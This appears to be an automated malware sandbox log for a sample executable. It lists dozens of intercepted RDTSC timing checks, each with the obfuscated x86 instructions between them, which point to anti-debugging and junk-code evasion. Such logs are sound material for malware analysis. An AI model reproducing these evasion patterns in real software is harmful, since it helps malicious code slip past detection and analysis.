Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B13279 second address: B132F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 je 00007FDFF8F79156h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 jl 00007FDFF8F79162h 0x00000016 jmp 00007FDFF8F7915Ch 0x0000001b pushad 0x0000001c jnl 00007FDFF8F79156h 0x00000022 jne 00007FDFF8F79156h 0x00000028 popad 0x00000029 popad 0x0000002a mov eax, dword ptr [esp+04h] 0x0000002e jmp 00007FDFF8F79169h 0x00000033 mov eax, dword ptr [eax] 0x00000035 pushad 0x00000036 jmp 00007FDFF8F79167h 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007FDFF8F7915Eh 0x00000042 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B132F1 second address: B132F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AA3923 second address: AA3929 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B16C4B second address: B16C6A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FDFF9160A35h 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B16C6A second address: B16C70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B17255 second address: B17285 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF9160A33h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007FDFF9160A26h 0x00000011 jmp 00007FDFF9160A31h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B17285 second address: B1728F instructions: 0x00000000 rdtsc 0x00000002 jns 00007FDFF8F79156h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B17403 second address: B1740D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B176C7 second address: B176FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF8F79168h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FDFF8F79180h 0x0000000f pushad 0x00000010 jmp 00007FDFF8F7915Dh 0x00000015 jl 00007FDFF8F79156h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AE94EF second address: AE94F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AE94F9 second address: AE954B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov cx, 3DACh 0x0000000c lea eax, dword ptr [ebp+1247D211h] 0x00000012 push 00000000h 0x00000014 push eax 0x00000015 call 00007FDFF8F79158h 0x0000001a pop eax 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f add dword ptr [esp+04h], 0000001Ah 0x00000027 inc eax 0x00000028 push eax 0x00000029 ret 0x0000002a pop eax 0x0000002b ret 0x0000002c and ecx, dword ptr [ebp+122D360Ah] 0x00000032 xor dword ptr [ebp+122D225Dh], ebx 0x00000038 nop 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007FDFF8F7915Fh 0x00000040 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AE954B second address: AD1D83 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jne 00007FDFF9160A40h 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push esi 0x00000013 call 00007FDFF9160A28h 0x00000018 pop esi 0x00000019 mov dword ptr [esp+04h], esi 0x0000001d add dword ptr [esp+04h], 0000001Dh 0x00000025 inc esi 0x00000026 push esi 0x00000027 ret 0x00000028 pop esi 0x00000029 ret 0x0000002a mov dh, al 0x0000002c call dword ptr [ebp+122D236Ch] 0x00000032 push esi 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007FDFF9160A38h 0x0000003a rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AF9884 second address: AF990B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b movzx ebx, si 0x0000000e push dword ptr fs:[00000000h] 0x00000015 mov ebx, dword ptr [ebp+122D36D6h] 0x0000001b mov dword ptr fs:[00000000h], esp 0x00000022 mov ebx, dword ptr [ebp+122D1E41h] 0x00000028 mov eax, dword ptr [ebp+122D000Dh] 0x0000002e push 00000000h 0x00000030 push ebx 0x00000031 call 00007FDFF8F79158h 0x00000036 pop ebx 0x00000037 mov dword ptr [esp+04h], ebx 0x0000003b add dword ptr [esp+04h], 00000018h 0x00000043 inc ebx 0x00000044 push ebx 0x00000045 ret 0x00000046 pop ebx 0x00000047 ret 0x00000048 call 00007FDFF8F79162h 0x0000004d sub dword ptr [ebp+122D219Bh], edi 0x00000053 pop edi 0x00000054 adc ebx, 2D2CB68Ah 0x0000005a xor di, 327Dh 0x0000005f push FFFFFFFFh 0x00000061 mov edi, dword ptr [ebp+122D34AEh] 0x00000067 push eax 0x00000068 push eax 0x00000069 push edx 0x0000006a jmp 00007FDFF8F7915Ah 0x0000006f rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AF990B second address: AF9911 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AE9B1A second address: 93F8F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 jne 00007FDFF8F7916Eh 0x0000000e nop 0x0000000f mov cl, C9h 0x00000011 push dword ptr [ebp+122D0C79h] 0x00000017 je 00007FDFF8F7915Ch 0x0000001d mov dword ptr [ebp+122D33D9h], edi 0x00000023 call dword ptr [ebp+122D22A5h] 0x00000029 pushad 0x0000002a mov dword ptr [ebp+122D1B86h], edi 0x00000030 xor eax, eax 0x00000032 jbe 00007FDFF8F79166h 0x00000038 mov edx, dword ptr [esp+28h] 0x0000003c jo 00007FDFF8F7916Bh 0x00000042 jmp 00007FDFF8F79165h 0x00000047 mov dword ptr [ebp+122D3592h], eax 0x0000004d mov dword ptr [ebp+122D1992h], esi 0x00000053 mov esi, 0000003Ch 0x00000058 xor dword ptr [ebp+122D1A21h], eax 0x0000005e add esi, dword ptr [esp+24h] 0x00000062 add dword ptr [ebp+122D1B86h], esi 0x00000068 lodsw 0x0000006a add dword ptr [ebp+122D1A21h], edi 0x00000070 add eax, dword ptr [esp+24h] 0x00000074 jmp 00007FDFF8F79169h 0x00000079 stc 0x0000007a mov ebx, dword ptr [esp+24h] 0x0000007e sub dword ptr [ebp+122D1992h], ebx 0x00000084 nop 0x00000085 push eax 0x00000086 push edx 0x00000087 push ebx 0x00000088 push eax 0x00000089 push edx 0x0000008a rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AE9BD0 second address: AE9C5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 xor dword ptr [esp], 31CCE185h 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007FDFF9160A28h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 00000016h 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 movsx ecx, ax 0x0000002b call 00007FDFF9160A29h 0x00000030 jmp 00007FDFF9160A30h 0x00000035 push eax 0x00000036 pushad 0x00000037 jnp 00007FDFF9160A31h 0x0000003d jmp 00007FDFF9160A2Bh 0x00000042 jmp 00007FDFF9160A33h 0x00000047 popad 0x00000048 mov eax, dword ptr [esp+04h] 0x0000004c pushad 0x0000004d jmp 00007FDFF9160A2Ah 0x00000052 pushad 0x00000053 jmp 00007FDFF9160A2Eh 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AFBF1C second address: AFBF2E instructions: 0x00000000 rdtsc 0x00000002 jns 00007FDFF8F79158h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AE9C5F second address: AE9C8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 push esi 0x00000009 jmp 00007FDFF9160A30h 0x0000000e pop esi 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jns 00007FDFF9160A2Ch 0x0000001b rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AFBF2E second address: AFBF3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDFF8F7915Bh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AFC007 second address: AFC00B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AE9D6B second address: AE9D86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDFF8F79166h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AE9D86 second address: AE9D8B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AE9D8B second address: AE9DAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FDFF8F79162h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AE9DAB second address: AE9DB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AE9E21 second address: AE9E25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AE9E25 second address: AE9E70 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jnp 00007FDFF9160A3Fh 0x0000000e xchg eax, esi 0x0000000f mov ecx, dword ptr [ebp+122D37D2h] 0x00000015 nop 0x00000016 jmp 00007FDFF9160A31h 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f jng 00007FDFF9160A26h 0x00000025 pop eax 0x00000026 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AFD07F second address: AFD0A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDFF8F79163h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FDFF8F7915Bh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AFD0A4 second address: AFD0A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AE9FCB second address: AE9FE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF8F7915Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jl 00007FDFF8F7915Eh 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AEA0FB second address: AEA101 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AEA48C second address: AEA4B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push esi 0x00000008 jmp 00007FDFF8F79166h 0x0000000d pop esi 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 pushad 0x00000014 popad 0x00000015 pop edi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AFEEAD second address: AFEEB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AFEEB3 second address: AFEEC9 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FDFF8F7915Ch 0x00000008 jnp 00007FDFF8F79156h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B00D49 second address: B00D5C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FDFF9160A2Ah 0x0000000e rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AFEEC9 second address: AFEECD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AEA7F4 second address: AEA7FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AEA8C3 second address: AEA8D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AEA8D4 second address: AEA8DE instructions: 0x00000000 rdtsc 0x00000002 jns 00007FDFF9160A26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AEA9C6 second address: AD28E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebx 0x0000000b call 00007FDFF8F79158h 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], ebx 0x00000015 add dword ptr [esp+04h], 00000017h 0x0000001d inc ebx 0x0000001e push ebx 0x0000001f ret 0x00000020 pop ebx 0x00000021 ret 0x00000022 call dword ptr [ebp+122D195Ch] 0x00000028 jng 00007FDFF8F79180h 0x0000002e push eax 0x0000002f push edx 0x00000030 jns 00007FDFF8F79156h 0x00000036 jc 00007FDFF8F79156h 0x0000003c rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AD28E9 second address: AD28F3 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FDFF9160A26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B1B795 second address: B1B7AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF8F79164h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B1B7AD second address: B1B7B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B1BA68 second address: B1BA96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF8F79163h 0x00000007 je 00007FDFF8F79156h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jns 00007FDFF8F7915Eh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B1BBD1 second address: B1BBD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B1BBD7 second address: B1BBF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007FDFF8F79166h 0x0000000c jno 00007FDFF8F79156h 0x00000012 jmp 00007FDFF8F7915Ah 0x00000017 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B1BBF3 second address: B1BC1C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF9160A2Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a jne 00007FDFF9160A32h 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B1BF10 second address: B1BF15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B1BF15 second address: B1BF4B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007FDFF9160A34h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FDFF9160A38h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B1C0BB second address: B1C0C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B1EA7B second address: B1EA83 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B1EA83 second address: B1EA9B instructions: 0x00000000 rdtsc 0x00000002 jc 00007FDFF8F7915Ch 0x00000008 js 00007FDFF8F79156h 0x0000000e push eax 0x0000000f push edx 0x00000010 jo 00007FDFF8F79156h 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B28A19 second address: B28A3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jmp 00007FDFF9160A36h 0x0000000b jo 00007FDFF9160A26h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B27A49 second address: B27A4E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B28138 second address: B2813C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B2813C second address: B28140 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B28140 second address: B2814E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FDFF9160A28h 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B2875A second address: B28760 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B28760 second address: B28772 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FDFF9160A2Ch 0x0000000b rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B2E3B7 second address: B2E3D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDFF8F79168h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B2CFAC second address: B2CFB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B2D0F3 second address: B2D0FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B2D511 second address: B2D517 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B2D517 second address: B2D51E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B2D51E second address: B2D52A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FDFF9160A2Eh 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B2D52A second address: B2D532 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B2D532 second address: B2D536 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B2D536 second address: B2D53A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B2D53A second address: B2D540 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B2D6C5 second address: B2D6CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B2D826 second address: B2D82C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B2D82C second address: B2D830 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B2D9B4 second address: B2D9D2 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FDFF9160A39h 0x00000008 jmp 00007FDFF9160A33h 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B34F4C second address: B34F52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B34F52 second address: B34F56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B34F56 second address: B34F5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B34F5C second address: B34F62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B34F62 second address: B34F6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B34F6A second address: B34F95 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF9160A2Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FDFF9160A35h 0x00000012 rdtsc
